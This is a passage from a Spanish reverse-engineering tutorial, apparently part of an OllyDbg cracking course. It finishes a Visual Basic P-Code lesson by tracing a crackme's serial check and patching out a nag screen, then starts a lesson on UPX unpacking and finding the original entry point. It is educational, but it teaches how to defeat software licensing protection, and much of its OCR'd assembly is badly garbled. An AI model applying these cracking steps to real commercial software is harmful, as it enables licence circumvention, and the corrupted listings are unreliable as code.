: 04 FLdRfYar local_00CC 

¿15 Litl4: 0x30 48 (...0) 

: 3a LitVarStr: [local_009C ] Clave Correcta!! 
: de FStYarCopyObj local_00AC 

: 04 FLdRfYar local_00AC 

: Da ImpAdCallFPRA: 


Aq1E7E: 2f£ FEraaliar lacal AÑAPS lacal AÑCP lacal ANEP lacal n1NPF 


Allí lo vemos claro, la posible comparación y el salto condicional que decide entre ir a CLAVE NO 
VALIDA o CLAVE CORRECTA, pues pongamos un BPM ON ACCESS allí, a ver si vemos algo. 


401E0F: Lead0/ef ConcatVar 
401E13: Lead0/40 NeVarBool 


1 
> Breakpoint Mernory, on access 


ua g1ES 64 — Search for d Mernory, on verite 


Bueno demos RUN 


YTE PTR DS: [ESI+2] 
ADO E e 


MOU EAX, DWORD PTR SS: [EBP+8] 

MOU DWORD PTR SS: CEBP-40],EAX 

XOR EAX, EAX 

MOU AL,BYTE PTR DS:[ESI] 
INC ESÍ 


24 dMP_DWORD PTR_DS: [EAX*4+7413ED94] 
A EAX, WORD PTR DS: [ESI] 


en WORD_PTR DS: CEAX+EBPI,Bx 
MOU AL,BYTE PRR DS: [ESI+2] 
ADD ESI,3 


FNDOTA 


MOUSX EAX,WORD_PTR_DS: [ESIJ 
POP DWORD _PTR DS: CEAX+EBPI 
XOR EAX, ERX 
MOU AL,BYTE PTR DS: [ESI+2] 

D ESI,3 


2 | 500 EST. 


XOR EAX, EAX 
AL, BYTE PTR DS: [ESI] 
_| INC Esi 


20R ERX, ERX 
ACES St BYTE PTR DS: [ESI]J 


X0OR EAX, EAX 
MOU AL,BVTE PTR DS:[ESI] 
INC ESI 


"| ROR EAX, EAX 
MOU AL,ÉVTE PTR DS:CESI] 
_| Inc Est 


¿ERX 
MOU AL,BVTE PTR DS:[ESI] 
INC ESI 
CMP EAX,33 


4 FE FB 40 18 78171 *+x 
AA 24 FF Ed FF! fe.d T 


Allí esta el segundo OPCODE es EF 
Vemos en la lista de opcode 
FB EF 6BAB 25AD 2 


FB FO 6B99 259B 0 vbaStrCat 
FB F1 C423 B981 0 Push [FCOD134] 


Que FB EF no nos aclara que es, igual el EXDEC nos decia algo de concatenar variables, veamos. 


401E07: 3a LitVarStr: (local_009C ) CRK 


401E0C: 04 FLdRfVar local_018C 
401E0F: Lead0/ef ConcatVar 
401E13: Lead0/40 NeVarBool 


Vemos que justo antes de este opcode trabaja con dos variables locales y en una tiene la STRING CRK y 
hay otra que esta en EBP-018C veamos que hay en cada variable que menciona. 


Command ? ebp-9c y] HEX: 12F444 - DEC: 1242180 - ASCII: DÓD 
AA 


La primera de las dos variables es EBP-9c que en mi maquina es 12F444 y allí esta como dice el EXDEC 


ZII 


DUBOBDaO 
p00BBB61 
515151151515) 
15]s/515]5]51515] 
1s151515]5]512] 
DOBOBZEA 
151515151515) 
Js/s1s1515151=3 
15]s1515]]5]515] 
60401748 UNICODE "CRK” 
1515151515112] 
115151515]5]51%) 
BOCFECCA 
BO12F4EC 
Bu12FSCS 
DOCFEBSC 


¡DEE 


AC 


aaa 


Y en la otra sabemos que en el caso de variables hay primero un byte que indica el tipo en este caso el 3 y 
mas abajo esta la variable realmente que será 2E.A. 


Command ?ebp-18c y| HEX: 12F354 - 


b612F414 
lll 101512] 


DOES 


BOBBBZES 


Entremos en el OPCODE 


a an Dij+] $0) 9] > LJEJMT|W) 


MOUSA EDI,WORD PTR DS: [ESI] 
ADD EDI,EBP 
PUSH EDI 


PUSH _EDI 

XOR EAX, EAX 

MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,3 


PUSH_EAX 
XMR FAX. FAX 


Allí lee los parámetros 


MOUSA EDI, WORI 
ADD EDI,EBP 
PUSH EDI 


PUSH_EDI 
XOR EAX, EAX 


1 434 
Bu12F354/| A Bu12F354 
pu12F444 = Bu12F444 
pa12F414 
5151515151158] 


NaRaaaaa 


Veamos que hay en cada uno, recordemos que cuando trabaja con Var como en este caso, hay que mirar 
una pequeña estructura ya que el primer byte como vimos antes es el tipo de variable, etc. 


Hilo 
có, 
a+. Ez+. 
NETA 


DOS 
DOS 


¡43 BB 52 66 
20 09 09 qu 
61 60 76 Ba 
4e 0 ér 09 


rra ma se 


DO: 
2... 


Bueno hagamos la ensalada de variables a ver que queda jeje. Si entramos dentro de la api vbaVarCat 
llegamos a una api interior que nos muestra más claro que va a unir. 


III AA LL 


CAP DOWORD_PTR SS: [EBP-C],-1 


PUSH DWORD PTR SS: [EBP-C] 
PUSH DWORD PTR SS: [EBP-8] 


CALL_MSUBUMSO. _vbaStrCat 
MOU ESI,DWORD PTR SS: [EBP+8] 
CHP DWORD PTR SS: CEBP-41,0 
EIA 


NaADEArc 


56|v DFS 
5| FF?S 


mora 


ST 
T 


S 
-/ 


HEODaE 


UB... 


¡DODOD( 
¡DOS 


y yu vu re ER 
6c EG 1515] co Do 30 50 Ba EE 6 S 


Command ? 02ea y] HEX: 2EA - DEC" 746 - ASCII: 00é 


[ Breaknoint at MSVBVM50.74044B5C 


O sea que la api vbaVarCat toma una string en este caso y una variable numérica que convierte a string y 
las unirá. 


Sigamos traceando con f8 


Al llegar al RET de la api vemos 


Registers (FPU) 
EAs BB1SDSSC UNICODE "CRK746" 


[Am > 


Xx FFFFOBOS 
ESP BO12F320 
EBP BO12F33C 
ESI 0O4B1E11 
EDI MAI2E43 
EIP 740420FB MSUBUNMSO. 740420FB 
2bit OLFFFFFFFE) 
it DLFFFFFFFF) 
it BUFFFFFFFF) 
it BLFFFFFFFF) 
it ?FFDFOBOLFFF) 


HOTFiD"D 
¡DODOD 


Como unió y formo una linda string con ambas variables. 


BFS4 B4FOBS0B 
FF7S F4 PUSH DWORD PTR SS: [EBP-C] 
FF7S FS PUSH DWORD PTR SS: [EBP-8] 
ES_2ED5FFFF 

3B75 Us MOV ESTI, DWORD PTR 55: [EBP+8] 
3837D_F 


m1] 
66:C706 B30b 
8946 us 


MOU DWORD PTR DS: CESI481 EAX 
MOU EAX,ESI 
ESI 


MOU EAX, DWORD _PTR_SS: [EBP-4] 
CMP WORD _PTR DS: [EAX+50],8 


PUSH DWORD PTR DS: [EAX+58] 
MOU ECX, DWORD _PTR_SS: [EBP-4] 


4D_FC 
66:C741 50 60001 MOU WORD PTR DS: [ECxX+50],0 
8B45 FC MOU EAX, DWORD _PTR_SS: [EBP-4] 


66 660 00 00 
60 60 00 00 
66 60 00 00 
69 98 09 99 


Vemos como el primer argumento ahora es del tipo 8 o sea string, y que apunta a 15d88c que esta la 
string concatenada. 


Iddress 
Sa bb 46 66 37 BB/C.R.K.f. 


Ub 574 PUSH_EUL 
XOR EAX, EAX 
3446 B2 MOU AL,BYTE PTR DS: [ESI+2] 
8306 63 ADD ESI,3 


FF2485 

Es 18D1F6FF 
50 

3300 


R EAX, ERX 
2A06 MOU AL,BYTE PTR DS:[ESI] 
46 INC ESI 


FF2485 

ES 1AD1FOFF 
50 PUSH_EAX 

3300 X0R EAX, ERX 

oa Ea == BYTE PTR DS: [ESI] 
FF2485 24ED137: 

3300 20R ERX, ERX 


401E13: Lead0/40 NeVarBool 


Como es doble y es FB40 traceo hasta que lee el segundo OPCODE 


address | Her duno [Asc 
=1F8-48 1A 78 FF 36 04 D0/1B+: 64. 
1C 99 01 
FF SA 44 
FF 04 34 
ga 3A 64 
64 66 4E 54 FF 04 54 


XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI] 
INC ESI 


| ROR EAX, EAX 
MOU AL,ÉVYTE PTR DS:[ESI] 
_| INC Est 


XOR EAX, ERAX 
MOU AL,BYTE PTR DS: [ESI] 
INC ESI 


Por supuesto la lista de Microsoft no dice nada sobre el, así que traceemos el opcode a ver que hace, jeje. 


mou SHORT MSUDUME .1413ED034 
PUSH_B 
mou A SUBUMSO-741 .4413ED74 


COR EPR EAN O DS: [EBX+EAX*4] 
rta Es BYTE PTR DS: [ESI] 


A 
LE 


Pra 


Os 06 06 60 60 sa 00 au e 
2148 17 40 00 00 60 00 001 H+e 


b6 66 06 Y 
14 F4 12 0 
a Ba Ba Ba a 


Olocono... 


Pues parece que va a comparar ambas strings. 


PUSH_B 
MOU EBX, MSUBUMSO. 7413ED74 


PUSH_DIORD PTR DS: CEBX+EAX*41 
XOR EAX, EAX 
3A06 MOU AL,BYTE PTR DS:CESI] 


BB 74ED1374 
ES 3E150000 
FF3483 


Pongamos un BP para sacarnos la duda, pasemos la call con f8 y lleguemos al otro opcode 


Vemos que en el stack quedo FFFFFFFF posiblemente porque las strings no son iguales, anotemos el 
posible serial bueno y probemos hasta que pare en el BP que pusimos nuevamente aquí. 


Usuario: [narvaja 
Serie Núm.: [CA K7A6 


Registrar | 


Al apretar registrar 


[hol o Y ICY LILA U na ni up LI IO VU NM AL YY U —p 


di ul +) 1/ejmtjwjnjc 


PUSH_B 
MOU EBX, MSUBUMSO. 7413ED74 


PUSH_DWORD PTR DS: [EBX+EAx*4] 
XOR EAX, EAX 

MOU AL,BYTE PTR DS: [ESIJ 
INC ESI 


BB 74ED1374 
ES 3E150000 
FF3483 


Llego de nuevo a la call la paso con f8 y llego al siguiente opcode como antes 


É 


í 


É 
HH 


Vemos que en este caso el resultado es cero al ser las strings iguales. 


= Curso sobre P-Code. Por ... (X. 


Usuario: 


Serie Núm.: A Clave Correcta!! 


Como ven sin necesidad de tracear todo, solamente encontrando la parte caliente y traceando algún 
opcode desconocido, me sirvió para encontrar el serial de este programa. 


Para los que quieran el listado mas detallado aquí va un detalle que me enviaron. 


401CC0: 04 FLdRfVar local_008C 
401CC3: 21 FLdPrThis ; Load reference pointer into item 


; Accede a metodo ITEM DESCRIPTOR TABLE 


yo] 
[e] 
JS. 
ju] 
—= 
mm 
> 


401CC7: 19 FStAdFunc local_0088 
401CCA: 08 FLdPr local_0088 
Lee contenido de texbox 


, 
401CD2: 6c ILdRF local_008C ; NOMBRE 
401CD5: 1b LitStr: 8 ; Empuja cadena a la pila 
401CD8: Lead0/30 EqStr ; Compara dos cadenas 
401CDA: 2f FFreel1Str local_008C 
401CDD: la FFreelAd local_0088 


; Salta si comparacion falsa 
; Salto incondicional 


401CE6: 04 FLdRfVar local_008C 
401CE9: 21 FLdPrThis 


; Accede a metodo ITEM DESCRIPTOR 


TABLE 
401CED: 19 FStAdFunc local_0088 
401CFO: 08 FLdPr local_0088 


Lee contenido de texbox 


= 


Salta si falso (es >= 6) 


401CF8: 6c ILdRF local_008C ; NOMBRE 

401CFB: 4a FnLenStr 

A01CFC: f5 LitlI4: 0x6 6 (....) ; Pasa entero de 4 bytes (6) 
401D01: d1 LtI4 ; ¿Comparacion menor que? 
401D02: 2f FFree1Str local_008C 

401D05: la FFreelAd local_0088 

401008: 1c Branch:  401D3F ; 

401D0B: 27 LitVar_Missing 

401D0E: 27 LitVar_Missing 

401D11: 3a LitVarStr: ( local_00BC ) P-Code 

401D16: 4e FStVarCopy0bj local_00CC 

401D19: 04 FLdRfVar local_00CC 

401D1C: f5 LitlI4: 0x40 64 (...0) 

401D21: 3a LitVarStr: ( local_009C ) Mínimo 6 caracteres 

401D26: 4e FStVarCopy0bj local_00AC 

401D29: 04 FLdRfVar local_00AC 

401D2C: 0a ImpAdCallFPR4:  _rtcMsgBox 


401D31: 36 FFreeVar local_00AC local_00CC local_00EC local_010C 

¡Si < 6 caracteres a la calle 
401D3F: 04 FLdRfVar local_008C 
401D42: 21 FLdPrThis 


401D46: 19 FStAdFunc local_0088 
401D49: 08 FLdPr local_0088 


401D51: 3e FLdZeroAd 
401D54: 46 CVarStr 
401D57: 04 FLdRfVar 


401D5F: 04 FLdRfVar 
401D62: 04 FLdRfVar 


401D6A: 04 FLdRfVar 


401D6D: Lead1/f6 FStVar 


401D71: la FFreel1Ad 
401D74: 36 FFreeVar 
401D7B: 04 FLdRfVar 


401D7E: Lead0/eb FnLenVar 
401D82: Lead1/f6 FStVar 


401D86: 28 LitVarl2: 
401D8B: 04 FLdRfVar 
401D8E: 04 FLdRfVar 


401D91: Lead3/68 ForVar: 


401D97: 28 LitVarl2: 
401D9C: 04 FLdRfVar 


401D9F: Lead1/22 CI4Var 


401DA1: 04 FLdRfVar 
401DA4: 04 FLdRfVar 


401DAC: 04 FLdRfVar 


401DAF: Lead2/fe CStrVarval 


401DB8: 44 CVarl2 


401DBB: Lead1/f6 FstVar 


401DBF: 2f FFreeiStr 
401DC2: 36 FFreeVar 
401DC9: 04 FLdRfVar 
401DCC: 04 FLdRfVar 


401DCF: Lead0/94 AddVar 
401DD3: Lead1/f6 FStVar 


401DD7: 04 FLdRfVar 


401DDA: Lead3/7e NextStepVar: 


401DE0: 04 FLdRfVar 
401DE3: 04 FLdRfVar 


401DE6: Lead0/94 AddVar 
401DEA: Lead1/f6 FStVar 


401DEE: 04 FLdRfVar 
401DF1: 21 FLdPrThis 


local_008C 
local_00AC 
local_00CC 


local_00CC 
local_00EC 


local_00EC 
local_011C 
local_0088 
local_011C 


local_012C 


( local_00BC ) 0x1 


local_013C 
local_012C 


(when done) 401DE0O 
( local_00AC ) 0x1 


local_013C 


local_011C 
local_00CC 


local_00CC 
local_008C 


local_00BC 


local_00AC local_00CC 


local_016C 


local_008C 
local_00AC local_00CC 


local_017C 
local_016C 
local_00AC 
local_017C 
local_013C 
(continue) 
local_017C 
local_012C 
local_00AC 
local_018C 
local_008C 


401DF5: 19 FStAdFunc 
401DF8: 08 FLdPr 


401E00: 3e FLdZeroAd 
401E03: 46 CVarsStr 
401E06: 5d HardType 


401E07: 3a LitVarStr: 


401E0C: 04 FLdRfVar 


401E0F: Lead0/ef ConcatVar 
401E13: Lead0/40 NeVarBool 


401E15: la FFreel1Ad 
401E18: 36 FFreeVar 


401E22: 27 LitVar_Missing 
401E25: 27 LitVar_Missing 
401E28: 3a LitVarsStr: 
401E2D: 4e FStvarCopy0bj 


401E30: 04 FLdRfVar 
401E33: f5 LitlI4: 


401E38: 3a LitVarStr: 
401E3D: 4e FStvarCopy0bj 


401E40: 04 FLdRfVar 


local_0088 
local_0088 


local_008C 
local_00CC 


( local_009C ) CRK 


local_018C 


local_0088 


( local_00BC ) P-Code 


local_00CC 
local_00CC 
ex10 16 


local_00AC 
local_00AC 


(A 
( local_009C ) Clave No 


401D97 


local_00CC local_00AC 


) 


; Lee contenido de texbox 
: NOMBRE 


; Convierte a minusculas 


, Incio bucle for next 


; Va tomando los caracteres del 
Fo... nombre 


: convierte valor carácter a hexadec 


; Fin bucle for-next? 


; Lee contenido de texbox 
; SERIAL 


Válida! 


401E48: 


401E7F: 
401E8A: 
401E8C: 


36 FFreevar local_00AC local_00CC local_00EC local_010C 


: 27 LitVar_Missing 
: 27 LitVar_Missing 


: 3a LitVarStr: ( local_00BC ) P-Code 
: 4e FStVarCopy0bj local_00CC 
: 04 FLdRfVar local_00cc 
: f5 Litl4: 0x30 48 (...0) 
: 3a LitVarStr: ( local_009C ) Clave Correcta!! 
: 4e FStVarCopy0bj local_00AC 
: 04 FLdRfVar local_00AC 
36 FFreeVar local_00AC local_00CC local_00EC local_010C 


Lead1/c8 End 
13 ExitProcHresult 


Bueno allí esta claro todo el trabajo del crackme. 


Es bueno saber hacerlo con OLLY, porque hay programas que se protegen contra el WKT contra el 
EXDEC y al menos con OLLY siempre podremos mientras el programa corra en el mismo, lo cual como 
ya vimos con los plugins que hay para ocultar OLLYDBG, es bastante sencillo salvo muy contadas 
excepciones. 


Tomemos el crackme adjunto nags1 que nos pide eliminar la nag inicial, veamos su listado en EXDEC. 


Proc: 401a40 

401A14: 27 LitVar_Missing 

401417: 27 LitVar_Missing 

401A1A: 27 LitVar_Missing 

401A1D: f5 Litl4: 0x0 O (....) 

401A22: 3a LitVarStr: (local_0094 ) NAG 
401A27: 4e FStVarCopyObj local_00A4 
401A2A: 04 FLdRfVar local_00A4 
401A2D: 0a ImpAdCallFPRA4: _ricMsgBox 
401A32: 36 FFreeVar local_00A4 local_00C4 local_00E4 local_0104 
401A3D: 13 ExitProcHresult 


Proc: 401958 


401954: Lead1/c8 End 
401956: 13 ExitProcHresult 


Vemos que la famosa NAG es solo un rtcMsgBox pero por si no saben aquí en PCODE no existe el NOP, 
jeje asi que hay que nopear con OPCODES que no afecten el resto del programa, 


aL e +10) 9] > LJEJMT|IWH] 


ADD BYTE PTR DS: [EAXJ], AL 
aJals]z ADD BYTE PTR DS: [EAX],AL 
0009 ADD BYTE PTR DS: LEAXI. AL 


Arranco el programa voy a poner un BPM en el opcode al rtcMsgBox 


401A2D: 0a ImpAdCallFPRA4: _ricMsgBox 


Binary 
Label 


Cazsreh far 


[ADO EsI,3 


MOU EAX, DWORD PTR SS: [EBP+8] 
MOU DWORD_PTR SS: [EBP-4C7,EAX 
XOR EAX, ERX 

MOU AL.BYTE PTR DS: [ESI] 


Vemos que el stack esta en 12f9e8, lleguemos hasta el otro opcode por supuesto saldrá la nag que 
tendremos que aceptar antes de llegar al siguiente opcode. 


MOUZA ECX, WORD _PTR DS: [ESI] 

MOU EDX, DWORD PTR SS: [EBP-54] 
MOUV_EAX, DWORD PTR DS: [EDX+ECX*4] 
OR EAX, EAX 


MOUZX EDI,WORD PTR DS: [ESI+2] 
ADD ESI,4 
ADD EDI,ESP 


CMP EDI,ESP 


XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESIJ 
INC ESI 


MOUZX ECX,WORD_PTR DS: [ESI] 
MOU EDX, DWORD PTR SS: [EBP-54] 
MOV _EAX, DWORD PTR DS: [EDX+ECX4] 


OR ASUbUMS 
MOUVZX EDI,WORD PTR DS: [ESI+2] 
ADD ESI,4 


Allí llego al siguiente opcode luego de pasar por el CALL EAX que es la llamada a la api rtcMsgBox. 


El stack esta ahora en 12f9fc 


A 
pa 


O sea para que quede igual deberíamos hacer varios pops y no nos cabe alli, pues probaremos con un 
PUSH solo usaremos f5. 


F5 5CBE 1377414 Push imm+t4 
Ya que tiene 4 parámetros de largo igual que OA la que vamos a reemplazar 
OA  664E 1F30 4222 


Probemos cambiemos OA por F5 y pongamos todos los parámetros a cero 


FS 90 E Ba an 36 : 
5C FF 3€C FF[1C E FC FE 
B4/1..0.2.0 


Allí esta el siguiente opcode es el 36 como nos mostraba el EXDEC, siempre debemos fijarnos que el 
opcode que reemplaza tenga la misma cantidad de parámetros que el que vamos a reemplazar, así no hay 
problema y seguirá ejecutando el siguiente, guardemos los cambios. 


Undo selection Alt+BkSp 
Copy » 
Binary » 
Label : 
Breakpoint » 
Search for » 
Find references CtrHR 


Wiew executable file 


Copy to executable file h 
Go to » 


p 60 00 60 36 Us 
3C FF 1C FF FC F 

DG 30 16 40 4n 
AB AR-20 AR 24 aa 


Backup 
Copy 
Binary 
Search for 


Go to offset y CtriG 


5 e O A 


View image in Disassembler 


-= 


Mis sitios de red 


Nombre: | nagsla.exe 
Tipo: [Executable file f.exe] 


ADD EDI, EBP 
MOU WORD PTR DS: CEDIJ,8 


Mm Miño DTD cs FEnTAO 


7413DEB1 
7413DEB3 


FA1SMNEDO 


Command! 


Allí arranca sin la nag inicial, todo es cuestión de probar, quizás en algún caso habrá que usar otro opcode 
diferente para parchear, ahora como ejercicio me gustaría que quiten la nag del otro crackme que adjunto 
el nags2. 


Y los espero en la parte 31 con el final de PCODE en un programa comercial. 


Ricardo Narvaja 
08 de febrero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 31 
NOCIONES INICIALES SOBRE DESEMPACANDO 


Ustedes diran este se volvio loco, anuncio una tercera parte de PCODE y ahora comienza con 
desempacado, lo que pasa es que estoy viendo que en nuestra lista y en muchos crackers que me 
consultan, estan ansiosos por mejorar su perfomance en el unpacking, y PCODE hay muchos tutes 
incluso con WKT, ademas que no hay tantos programas hechos con PCODE, que creo que mas vale 
empezar con el tema de desempacado, ya que packers hay miles, por supuesto no veremos todos 
aquí pero daremos ideas generales y ejemplos que nos ayudaran a pensar packers que no hemos 
visto, por nosotros mismos, sin desesperarnos en buscar un tute por alli, (bueno a veces una ayuda 
puede servir jeje) 


En esta primera parte veremos algunos conceptos e ideas basicas que nos serviran para trabajar en 
unpacking, luego en futuras partes, pondremos manos a la obra, desempacando ejemplos. 


Bueno cual es la idea de empacar un programa, antes que nada 


Pues ya vimos que un programa desempacado es sencillo de modificar pues los bytes estan 
accesibles desde el inicio del mismo y no cambian (estan en el ejecutable), el listado es constante, y 
en cualquier momento podemos modificar cualquier byte sin problemas y guardar los cambios. 

Si un programa se automodifica y va cambiando a medida que corre, es mas dificil de parchear pues 
, lo que debes parchear no esta al inicio, y va cambiando a medida que corre el mismo, 


De esta manera, un programa empacado, al no tener el codigo original visible en un inicio, el codigo 
importante del programa original, no puede ser modificado facilmente, ya que no lo hallaremos, al 
estar encriptado inicialmente. 


Pues el tema es que cuando empacas una aplicación con un determinado packer, este encripta y 
guarda el codigo original del programa, bien escondido, y le agrega generalmente una o mas 
secciones, y en ellas le agrega una especie de cargador y redirige el Entry Point hacia este cargador- 
desempacador. 


Como resultado de esto el codigo del programa original no estara visible en el inicio, si arrancamos 
el programa en OLLYDBG y se detiene, lo hara en el ENTRY POINT del desempacador, desde 
donde comenzara a ejecutarse. 


Este desempacador, buscara la informacion guardada del codigo original encriptado, lo 
desencriptara y guardara en la ubicación original, una vez que el proceso de desencriptado ha 
concluido, saltara el OEP o Original Entry Point que es el punto de entrada que tenia el programa 
antes de ser empacado, o sea seria la primera linea del codigo original ejecutada. 


Buscaremos el empacador mas sencillo que existe, que es el UPX, bajaremos la version con GUI 
que es mas sencilla de usar se llama GUIPEX y se baja de: 


http://www .blueorbsoft.com/guipex/ 


ading, launch the setup file and follo 


, Use the "Uninstall" menu option from GUIP 


Bueno lo instalamos en nuestra maquina y lo corremos. 


e GUiPeX - UPX Front End for Win32 [Untitled Project] 


090.0: 


Run Stop Options Help Exit 


UPX Commands | 


File Tools Help 


us aa 


New Open Save Veco 


Files to Compress¿Decompress: 


Commands | Compress Y 

L ae a A — 

Icons | Compress all icons Mi] 

Dptions ¡<none> Y 

Overlay Handling | Copy Y 
Compression Level 7 


Best Compression Level 110000 Mm 3 
[Y] Compress Exports 


Load My Defaults Compress Resources 


Strip Relocation Records 


Load UPX Defaults O Force Compression 


Keep Backup File 


O files, O MB 


s.oasS UPX Dutput 


2/16/2006 4:23 4M 


Bueno alli tenemos al empacador mas sencillo, pero que a algunos les ha hecho pasar un mal rato 
jeje, usaremos como victima el famoso CRACKME DE CRUEHEAD antes que nada abramoslo en 
OLLYDBG sin empacarlo aun. 


[c] File View Debug Plugins Options Window Help 


LEER en] vis] elo] ul + 1 Jejmjt[wn/c]/Jx]8]R/-.]s] ¿5/3412| 


6A aa Pl pModu le = NULL 
Es FFo40000 |CALL <JMP.2£KERNEL32. GetModu leHandleA> GetlModu LeHandleA 
As MOV DWORD PTR DS: [46260A7,EAX 

5A an PUSH A Title = NULL 
68 F4204000 | PUSH CRACKME. 604B020F4 (sis "No need to disasm the codet” 
ai 


Findlindowh 
OR EAX, EAX 


en ero dE cae aca 4003 
402068], CRACKME.. lin dPx: 


06 . Ai CAa2o4000 

an4a104Al). 4209006 | MOJ DUORO PTR DS: 14020741, EAX 

aa4a104F II. PUSH 6 RsrcName 0. 
hase —=< 


araArat aC 4 cra Dc aa 


Alli lo tenemos abierto en OLLYDBG, el Entry Point es 401000 o sea que si lo corremos, esta seria 
la primera linea de codigo que se ejecutaría. 


O sea que si lo empacamos el GUIPEX le agregara y cambiara las secciones, y encriptara el codigo 
original, y lo guardara en algun lugar, luego cambiara el EntryPoint para que apunte al cargador- 
desempacador y listo. 


Entonces cuando corramos el programa empacado, el desempacador sacara del baul, el codigo 
original encriptado, lo desencriptara y ubicara en la primera seccion y luego de terminar su trabajo 
saltara a la primera linea de codigo original que se va a ejecutar, que es el famoso OEP, o ENTRY 
POINT ORIGINAL, que en nuestro caso ya sabemos que estara en 401000, ya que el programa 
original empieza alli y esa sera la primera linea que ejecute del mismo. 


Logicamente cuando nosotros atacamos un programa empacado, no tenemos el original para 
comparar y saber cual es el OEP o primera linea del codigo original ejecutado, por lo cual debemos 
aprender diversas tecnicas para hallarlo, antes que nada practiquemos con el CC (Crackme de 
Cruehead, jeje para abreviar) 


Guardemos una copia del CC en un lugar seguro por ejemplo el escritorio ya que el UPX 
modificara el que tenemos y necesitamos el original tambien, para comparar. 


Abro el GUIPEX 


ue: GUiPeX - UPX Front End for Win32 [Untitled Project] 


File Tools Help 


40H oQa.x3 


New Open Save elete Run Stop Options Help Exit 
Files to Compress¿Decompress: UPX Commands 

Fle 3 File Sizs Commands | Compress Y 

Icons | Compress all icons Y 

Options | <none> Y 

ARRASTRO EL Dverlay Handling ¡Copy ds] 
CRACKME AQUI Compression Level l — y E 7 

Best Compression Level | 10000 = 


Compress Exports 


Load My Defaults Compress Resources 
, Strip Relocation Records 
£ l > Load UPX Defaults 1] Force Compression 


D files, O MB [7] Keep Backup File 


SA É 3 UPX Output 


2/16/2006 4:33 4M 


Pues eso, arrastro y suelto el crackme alli 


ex GUiPeX - UPX Front End for Win32 [Untitled Project] 


File Tools Help 


DA» 00 m0 
New Open Save Leele Run Stop Dptioms Help Exit 
Files to Compress¿Decompress: UPX Commands 
AS le Commands | Compress y | 
C:AADocuments and SettinastRicardo'Escritorio401-Cra r = 
Icons | Compress all icons vw! 
Options. | <none> E] 
fa Overlay Handling ¡Copy v | 
1 Compression Level | y mé 
Best Compression Level 110000 5] 
Compress Exports 
Load My Defaults Compress Resources 
Strip Relocation Records 
£ | > Load UPX Defaults [] Force Compression 
1 file, 0.01 MB [] Keep Backup File 


Alli vemos que lo tomo ya que figura el path al crackme, y en COMMANDS elijo COMPRESS 


para que comprima , pues tambien puedo descomprimir con esta tool, y el resto de las opciones las 
dejo como muestra la figura. 


Una vez hecho eso apreto el boton RUN del GUIPEX para que haga el trabajo. 


e GUiPeX - UPX Front End for Win32 [Untitled Project] 


File Tools Help 


4BH20095003 


New Open Save Run Dptions Help Exit 
Files to Compress¿Decompress: | UPX Commands 
File 


Commands | Compress 


Y C:ADocuments and SettingsRicardovEscritorio401-( 


Options [ <none> 


vw 
ES En 7] 

Icons | Compress all icons Y 
Y 

Y 


Dverlay Handling ¡Copy 


Compression Level | U 7 


Best Compression Level 110000 al 


Compress Exports 
Load My Defaults Compress Resources 
Strip Relocation Records 
Si m | 7 Load UPX Defaults [] Force Compression 
1 file, 0.01 MB | [Keep Backup File 
v<.o»pS UPX Output 
Ultimate Packer for eXecutables An 
Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002 — 
UPX 1.24 Markus F.X.J. Oberhumer « Laszlo Molnar Nov 7th 2002 


IES 


2/16/2006 4:37 AM 


Alli vemos el OK de que la operación ha sido correcta y que el crackme en UPX OUTPUT ha sido 
empacado. 


A este crackme le cambiare el nombre para diferenciarlo del original le pondre CRACKME 
UPX.exe 


ardolEscritorio101-Crackme Ml ] 


Nombre + Tamaño Tipo Fecha de modificación 
E] crackme UPX.EXE 7KB Aplicación 09/01/1998 1:22 
[5] CRACKME.EXE 12KB Aplicación 09/01/1998 1:22 


Como vemos el crackme empacado es mas pequeño que el original, en una epoca esto era asi, ahora 


hay packer que agregan tanto codigo para proteger que son mucho mas grandes los empacados que 
el original, jeje. 


> 
About 


Si ejecutamos el empacado vemos que funciona igual que el original, ahora miremos un poco 
ambos, abramos dos OLLYDBG uno con el CRACKME UPX.exe y otro con el CRACKME.exe 
para comparar. 


ENTRY POINT DEL CRACKME.exe 


ESE En! OE EEIETES 2] 1/elmjt[wH/c]/]k/B]R]-..s] ¿=/41?] 


pModule = NULL 
ÉS FFO4D000 CALL <JMP. £KERNELSZ. Getiodu LeHandLeA> GetModu leHandleA 
A3 CA2049000 |MOU DWORD PTR DS: [4820CA],EAXx 


56A 66 PUSH U Title = NULL 

62 F4204000 | PUSH CRACKME. 004020F4 (stas: = "No need to disasm the codet” 
ES A6440bBb FindlWindowA 

BBCO OR EAX, EAX 


.v 74 Ol 
Ca 
PIAR Add MALL MMIARA PTR Mas áa?rAdA dias 


B161A 
6n461B10 
andatain 


5 
ENTRY POINT DEL CRACKME UPX.exe 


== MAMA 0 3 A 2 A 2 E Y 2 


E O] A A A a E SA E) 


5 60 PUSHAD 
> BE 00904000 |MOU ESI,CRACKME_. 600409000 
. e DOSBFFF e da PTR DS: [ESI+FFFF30007 


- 83D FF OR_EBP,FEFFFFFF 
.v EB 10 MP SHORT CRACKME_.90489C12 


NOP 
90 NOP 
90 NOP 
90 NOP 


Como vemos son diferentes el CRACKME UPX cambio el entry point por 409bf0, donde 
comenzara a ejecutarse el desempacador, y si en este ultimo voy a mirar que hay en la direccion 
401000 por supuesto no encuentro ni rastros del codigo original. 


ar cala ERE: +34) Pe Ds 


, 
DS: CEARI' AC 
DS: [EAXJ, AL 
DS: CEAX], AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: CEAXJ, AL 


DS: LEAX], AL 


MA. Train nm 


Como vemos la primera seccion esta completamente vacia, asi que el packer quito todos estos bytes 
los encripto y los guardo en alguna parte del codigo, ademas en este caso vacio la primera seccion 
completa. 


En general la mayoria de los packers, crean una propia seccion y se ejecutan desde alli, para tomar 


los bytes encriptados guardados del codigo original y arreglar la primera seccion, desencriptando el 
codigo original en ella. 


Si miramos nuevamente la rutina del desempacador sin ejecutarla, y bajamos. 


E] AD 
BE 060904008 _|MOU ESI,CRACKME_. 00409000 
ES DOSBFFFI LEA EDI,DWORD PTR DS: [ESI+FFFFS000] 


OR EBP,FFFFFFFF 


e) 
== 
117] 
Le 
m 
o 
—. 


BAJAMOS 


NOP 

MOU AL,BYTE PTR DS: [ESI] 
INC ESI 

MOU BYTE PTR DS: [EDIJ,AL 
DD EBx,EBx 

